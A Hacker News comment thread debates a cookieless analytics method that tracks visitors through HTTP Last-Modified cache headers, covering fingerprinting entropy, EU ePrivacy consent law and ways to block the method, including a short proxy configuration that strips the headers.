| planet, each day.
|
| is my math wrong, here?
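The arithmetic in the comment above can be checked directly. This sketch assumes each cached file carries an independent timestamp within a single day, so the number of distinguishable users is the per-file value count raised to the number of files. The world population figure of roughly 8 billion is an outside assumption, not something stated in the thread.

```python
HOURS_PER_DAY = 24
SECONDS_PER_DAY = 24 * 60 * 60  # 86,400

# Hour granularity across 6 cached files.
hourly_six_files = HOURS_PER_DAY ** 6

# One-second granularity across 2 and 3 cached files.
per_second_two_files = SECONDS_PER_DAY ** 2
per_second_three_files = SECONDS_PER_DAY ** 3

WORLD_POPULATION = 8_000_000_000  # rough assumption for comparison

print(hourly_six_files)       # 191102976
print(per_second_two_files)   # 7464960000
print(per_second_two_files >= WORLD_POPULATION)    # False
print(per_second_three_files >= WORLD_POPULATION)  # True
```

So the 191 million figure holds. Two files at one-second granularity give about 7.46 billion combinations, which falls slightly short of one per person under the population assumption above; a third file removes any doubt.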
| rnhmjoj wrote:
| There probably is one already: this method is so old that the
| documentation of privoxy shows[1] how to defeat it. I can
| confirm it works: their example[2] website says I've visited
| 61996 times.
|
| [1]: https://www.privoxy.org/user-manual/actions-file.html#OVERWR...
|
| [2]: https://lastmodified.normally.com/
| jesprenj wrote:
| What's the reason for not storing a cookie? It's not like
| browsers that don't support cookies are targeted, right? Cookies
| can also be "great for privacy", if their power is not abused
| server-side ...
| jefftk wrote:
| I think this is probably illegal in EU countries. The ePrivacy
| Directive requires consent before storing data on a user's
| machine that isn't strictly necessary for providing the service
| the user requested. Analytics isn't "strictly necessary", and
| ePrivacy doesn't care whether you use the Cookie header or some
| other method of storage.
|
| I do think this is better for privacy than standard id-based
| approaches, but the law is very strict. More:
| https://www.jefftk.com/p/why-so-many-cookie-banners
|
| (Not a lawyer)
| yellow_lead wrote:
| Assuming you're correct, can anyone think of a way to count
| unique visitors without storing data on a users machine _or_
| using identifiable user information? Identifiable user
| information should include hashes that can be re-computed given
| the original information.
|
| This isn't a criticism of the law, I'm just curious what
| options there could be, because I can't think of any.
| genewitch wrote:
| Hi there, Marketing Company Intern!
|
| Tell them you'd rather make the coffee ;-)
| 411111111111111 wrote:
| Ha, that would explain that question. My first reaction was
| mostly confusion as there is so much prior art at this
| point, i.e. fingerprinting through installed add-ons,
| resolution/window size/system language, browser language,
| IP locality etc. There are even demo pages around which
| shows you just how unique your configuration is even
| without anything else.
|
| https://amiunique.org/fp
| yellow_lead wrote:
| Lol, I knew it would sound that way, but I don't work in
| this domain - just interested in privacy and this problem.
| genewitch wrote:
| the only reason we could think of for wanting unique
| visitors was for the marketing people or
| investors/stakeholders/shareholders. Parsing the request
| logs should be sufficient for every other metric.
|
| We had a bunch of meetings about this at what essentially
| amounted to a giant information superhighway billboard
| company. IIRC someone brought up using cache headers even
| back then, because it didn't require cookies or
| javascript, which we couldn't guarantee would be "up to
| date", this is back in "target IE6, still" days.
|
| As one of my networking friends said, advertisers usually
| know everything about your metrics, even if you don't.
| You can't really fudge the numbers in your favor, so raw
| requests or QPS or whatever ancillary metric would be
| enough.
|
| the method in the article is defeated by clearing your
| session when you're done browsing, or using
| incognito/private browsing tab, as that should mark all
| "cached" items for deletion.
| [deleted]
| Quarrelsome wrote:
| I thought GDPR cared mostly about uniquely identifying visitors
| which this does not do. You still need a cookie banner to state
| that you will put some data on their machine but you always
| need one of those.
| jefftk wrote:
| _> you always need one of those_
|
| The withcabin.com landing page claims you don't need consent
| banners to use it.
| t0mas88 wrote:
| That claim is false in Europe. You need to ask permission
| for this approach, because you're storing something on the
| user's device (the generated date in the cache) that isn't
| strictly necessary. The ePrivacy directive says you need
| permission for that; nowhere does the law specify "cookies".
| It's about any kind of data stored on the user device.
| jefftk wrote:
| Uh, yes? That's exactly what I've been saying upthread.
| mgrund wrote:
| True it does not matter if it's a cookie, or whatever.
| You need to look to the ePrivacy directive article 5.3
| for which exemption case applies. In the case of
| timestamps, it would be case A :
|
| > when the cookie is used "for the sole purpose of
| carrying out the transmission of a communication over an
| electronic communications network" ("Exemption A")
|
| Since the timestamp is no longer used solely for this
| purpose, you need consent.
| bvinc wrote:
| What's to stop someone from sending unique last-modified dates to
| uniquely fingerprint browsers?
| nightpool wrote:
| Because the cache key for the site is partitioned by top-level
| origin in modern browsers, they wouldn't get any additional
| information this way that they couldn't get with existing
| first-party storage techniques, such as service worker caches,
| session cookies, IndexedDB, etc. See e.g.
| https://developer.mozilla.org/en-US/docs/Web/Privacy/State_P...
| for example. Opening a new incognito window would trivially
| defeat this method of "tracking". This is basically just a very
| small first-party-only cookie.
| SahAssar wrote:
| Then why not use a cookie? The laws regarding tracking are
| not actually about cookies, but about all cookie-like
| tracking. What does this method gain?
| nightpool wrote:
| The ability to put "no cookies :)" in your marketing
| materials
| [deleted]
| 1vuio0pswjnm7 wrote:
| What happens if the user disables Javascript?
|
| The page lastmodified.normally.com claims "Works in any browser
| or any server". What if the browser has no Javascript engine?
|
| In this case I tried the demo with a browser that has a JS
| engine, with JS enabled, and the demo still did not work. That is
| because "ping.withcabin.com" was not disclosed to the user. The
| OP suggests that users access "lastmodified.normally.com". It
| says nothing about accessing "ping.withcabin.com". As such, the
| proxy does not contain any address info for that domain. The user
| (me) never typed it.
|
| Instead of a browser, I use a localhost-bound forward proxy to
| control requests and responses, including HTTP headers. The proxy
| contains all of the domain-to-IP address mappings I need in
| memory. Why should I add an IP address for "ping.withcabin.com"?
| The request returns no content.
|
| 1. For example, something like
|
|     acl cabin hdr(host) -m str ping.withcabin.com
|     http-request del-header If-Modified-Since if cabin
|     http-response del-header Cache-Control if cabin
|     http-response del-header Last-Modified if cabin
| bennyp101 wrote:
| Seems a fairly benign way of counting how many people are
| visiting your site.
|
| Not like it's tracking you across domains and services, more a
| counter for how many people have visited, and either stayed and
| looked around, or left.
| meowface wrote:
| >Not like it's tracking you across domains and services
|
| The same can be said of first-party cookies.
___________________________________________________________________
(page generated 2022-11-30 23:00 UTC)